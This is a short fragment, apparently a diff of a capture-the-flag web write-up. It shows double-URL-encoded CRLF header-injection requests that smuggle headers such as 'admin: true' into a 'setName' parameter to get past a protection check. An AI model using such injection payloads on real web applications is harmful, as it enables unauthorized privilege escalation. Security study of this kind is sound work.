Web

 1 | GET /?setName=RCE%253A%201%0d%0aProtection-Secret HTTP/1.1 |

-And now we are left with the last header which is admin: true
+And now we are left with the last header which is admin: true.
+As stated before just double url encode it :))

 1 | GET /?setName=RCE%253A%201%0d%0a%2561%2564%256D%2569%256E%253A%20%2574%2572%2575%2565%0d%0aProtection-Secret HTTP/1.1 |